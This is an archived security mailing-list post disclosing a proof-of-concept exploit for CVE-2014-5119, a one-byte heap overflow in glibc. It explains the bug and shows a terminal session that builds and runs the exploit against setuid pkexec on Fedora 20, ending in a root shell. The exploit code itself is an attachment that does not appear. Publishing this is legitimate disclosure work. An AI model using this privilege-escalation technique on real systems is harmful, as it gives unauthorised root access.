Follow @Openwall on Twitter for new release announcements and other news
[<prev] [next>] [day] [month] [year] [list]
Message-ID: <CAJ_zFk+bKENpjHtgf63Kick8SM_sTo0RWTjo1MVejtTgU5RV4g@mail.gmail.com>
Date: Mon, 25 Aug 2014 19:00:15 -0700
From: Tavis Ormandy <taviso@...gle.com>
To: fulldisclosure@...lists.org, oss-security@...ts.openwall.com
Subject: CVE-2014-5119 glibc __gconv_translit_find() exploit

List, back in July, I described CVE-2014-5119, a fiendish single-fixed-byte
heap metadata overflow in the glibc internal routine
__gconv_translit_find().

This is caused by the file extension being incorrectly appended to the
transliteration module filename. The result is one too few bytes are
allocated, and a single nul byte is written out of bounds. This issue
affects real programs, that are typically default installed and setuid root.

Despite explaining that my research suggests this is exploitable, it
appears there has been general skepticism that single-fixed-byte overflows
are still exploitable with modern allocator metadata hardening.

As a result, the issue has been largely dismissed and downgraded in
severity. As little progress has been made in resolving the issue thus far,
we're publishing a proof of concept today. This exploit is specific to
Fedora 20 32-bit, but the issue is not specific to Fedora, and exploitation
on other systems and platforms is possible.

This issue is complex, and fiendishly difficult to exploit. Thanks to Chris
Evans for his heap expertise and insight. Some more information is
available on our team blog.

http://googleprojectzero.blogspot.com/2014/08/the-poisoned-nul-byte-2014-edition.html

$ make clean
rm -f pkexploit pty *.o a.out *.so
[taviso@...alhost glibc]$ make
cc -ggdb3 -O0 -Wno-multichar -std=gnu99 -D_OPEN_TRANSLIT_OFF=0x00023320
-ldl  pkexploit.c   -o pkexploit
cc -ggdb3 -O0 -Wno-multichar -std=gnu99 -D_OPEN_TRANSLIT_OFF=0x00023320
-ldl  pty.c   -o pty
cc -ggdb3 -O0 -Wno-multichar -std=gnu99 -D_OPEN_TRANSLIT_OFF=0x00023320  -c
-o exploit.o exploit.c
cc exploit.o -fPIC -shared -o exploit.so
Execute pkexploit to attempt exploitation.
[taviso@...alhost glibc]$ ./pkexploit
[*] ---------------------------------------------------
[*] CVE-2014-5119 glibc __gconv_translit_find() exploit
[*] ------------------------ taviso & scarybeasts -----
[*] Attempting to invoke pseudo-pty helper (this will take a few seconds)...
[*] Read 7295 bytes of output from pseudo-pty helper, parsing...
[*] pseudo-pty helper succeeded
[*] attempting to parse libc fatal error message...
[*] discovered chunk pointer from `corrupted double-lin...`, => 0x507e3658
[*] attempting to parse the libc maps dump...
[*] found libc.so mapped @0x40215000
[*] expecting libc.so bss to begin at 0x406c7000
[*] successfully located first morecore chunk w/tag @0x407d6000
[*] allocating space for argument structure...
[*] creating command string...
[*] creating a tls_dtor_list node...
[*] open_translit() symbol will be at 0x40238320
[*] offsetof(struct known_trans, fname) => 32
[*] appending `./exploit.so` to list node
[*] building parameter list...
[*] anticipating tls_dtor_list to be at 0x406c82d4
[*] execvpe(pkexec...)...
Error accessing / : File name too long
uid=0(root) gid=1000(taviso) groups=0(root),10(wheel),1000(taviso)
context=unconfined_u:unconfined_r:unconfined_t:s0-s0:c0.c1023
sh-4.2# exit
exit

Content of type "text/html" skipped

Download attachment "CVE-2014-5119.tar.gz" of type "application/x-gzip" (6066 bytes)

Powered by blists - more mailing lists

Please check out the Open Source Software Security Wiki, which is counterpart to this mailing list.

Confused about mailing lists and their use? Read about mailing lists on Wikipedia and check out these guidelines on proper formatting of your messages.